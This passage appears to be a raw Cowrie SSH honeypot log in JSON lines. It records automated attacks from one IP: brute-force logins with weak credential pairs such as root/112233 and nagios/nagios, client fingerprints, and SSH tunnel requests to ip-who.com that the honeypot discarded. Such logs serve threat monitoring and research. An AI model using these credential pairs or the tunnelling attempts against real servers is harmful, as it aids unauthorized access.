{"eventid":"cowrie.session.closed","duration":"8.2","message":"Connection lost after 8.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:29.874697Z","src_ip":"212.227.235.229","session":"a7faee1c9e01"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:29.875377Z","src_ip":"212.227.235.229","session":"b265e3c9054c"}
{"eventid":"cowrie.login.success","username":"root","password":"1234567890%*()","message":"login attempt [root/1234567890%*()] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:16:30.379843Z","src_ip":"212.227.235.229","session":"25d3942b0031"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:16:30.668774Z","session":"25d3942b0031"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:16:31.054105Z","src_ip":"212.227.235.229","session":"25d3942b0031"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:31.318999Z","src_ip":"212.227.235.229","session":"25d3942b0031"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57210,"dst_ip":"1.2.3.4","dst_port":22,"session":"08f25096cc9b","protocol":"ssh","message":"New connection: 212.227.235.229:57210 (1.2.3.4:22) [session: 08f25096cc9b]","sensor":"my-vps","timestamp":"2025-08-26T04:16:34.861685Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:34.926300Z","src_ip":"212.227.235.229","session":"08f25096cc9b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:36.960338Z","src_ip":"212.227.235.229","session":"08f25096cc9b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":57224,"dst_ip":"1.2.3.4","dst_port":22,"session":"eebe7cb072bf","protocol":"ssh","message":"New connection: 212.227.235.229:57224 (1.2.3.4:22) [session: eebe7cb072bf]","sensor":"my-vps","timestamp":"2025-08-26T04:16:37.375733Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:37.386170Z","src_ip":"212.227.235.229","session":"eebe7cb072bf"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:39.260695Z","src_ip":"212.227.235.229","session":"eebe7cb072bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58374,"dst_ip":"1.2.3.4","dst_port":22,"session":"6cad0ec2bf98","protocol":"ssh","message":"New connection: 212.227.235.229:58374 (1.2.3.4:22) [session: 6cad0ec2bf98]","sensor":"my-vps","timestamp":"2025-08-26T04:16:40.017165Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:40.018416Z","src_ip":"212.227.235.229","session":"6cad0ec2bf98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":54168,"dst_ip":"1.2.3.4","dst_port":22,"session":"7138e0402003","protocol":"ssh","message":"New connection: 212.227.235.229:54168 (1.2.3.4:22) [session: 7138e0402003]","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.138378Z"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.285342Z","src_ip":"212.227.235.229","session":"6cad0ec2bf98"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39434,"dst_ip":"1.2.3.4","dst_port":22,"session":"02e981c483a6","protocol":"ssh","message":"New connection: 212.227.235.229:39434 (1.2.3.4:22) [session: 02e981c483a6]","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.515631Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.517191Z","src_ip":"212.227.235.229","session":"02e981c483a6"}
{"eventid":"cowrie.login.success","username":"root","password":"112233","message":"login attempt [root/112233] succeeded","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.670128Z","src_ip":"212.227.235.229","session":"eebe7cb072bf"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:41.743712Z","src_ip":"212.227.235.229","session":"7138e0402003"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58380,"dst_ip":"1.2.3.4","dst_port":22,"session":"b3788ef54993","protocol":"ssh","message":"New connection: 212.227.235.229:58380 (1.2.3.4:22) [session: b3788ef54993]","sensor":"my-vps","timestamp":"2025-08-26T04:16:42.762111Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:42.763413Z","src_ip":"212.227.235.229","session":"b3788ef54993"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.235.229","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-26T04:16:43.119654Z","session":"eebe7cb072bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39458,"dst_ip":"1.2.3.4","dst_port":22,"session":"d7dd96f337d2","protocol":"ssh","message":"New connection: 212.227.235.229:39458 (1.2.3.4:22) [session: d7dd96f337d2]","sensor":"my-vps","timestamp":"2025-08-26T04:16:44.276378Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-26T04:16:44.292019Z","src_ip":"212.227.235.229","session":"d7dd96f337d2"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:44.786805Z","src_ip":"212.227.235.229","session":"7138e0402003"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-26T04:16:44.867967Z","src_ip":"212.227.235.229","session":"eebe7cb072bf"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":39444,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7e849ffe0fe","protocol":"ssh","message":"New connection: 212.227.235.229:39444 (1.2.3.4:22) [session: c7e849ffe0fe]","sensor":"my-vps","timestamp":"2025-08-26T04:16:45.108430Z"}
{"eventid":"cowrie.login.failed","username":"cpanel","password":"72b1bd75ac87852a","message":"login attempt [cpanel/72b1bd75ac87852a] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:45.750798Z","src_ip":"212.227.235.229","session":"08f25096cc9b"}
{"eventid":"cowrie.session.closed","duration":"8.6","message":"Connection lost after 8.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:45.945222Z","src_ip":"212.227.235.229","session":"eebe7cb072bf"}
{"eventid":"cowrie.login.failed","username":"nagios","password":"nagios","message":"login attempt [nagios/nagios] failed","sensor":"my-vps","timestamp":"2025-08-26T04:16:46.023762Z","src_ip":"212.227.235.229","session":"6cad0ec2bf98"}
{"eventid":"cowrie.session.closed","duration":"7.5","message":"Connection lost after 7.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:47.476891Z","src_ip":"212.227.235.229","session":"6cad0ec2bf98"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-26T04:16:47.834411Z","src_ip":"212.227.235.229","session":"d7dd96f337d2"}
{"eventid":"cowrie.session.closed","duration":"13.4","message":"Connection lost after 13.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T04:16:48.279131Z","src_ip":"212.227.235.229","session":"08f25096cc9b"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-c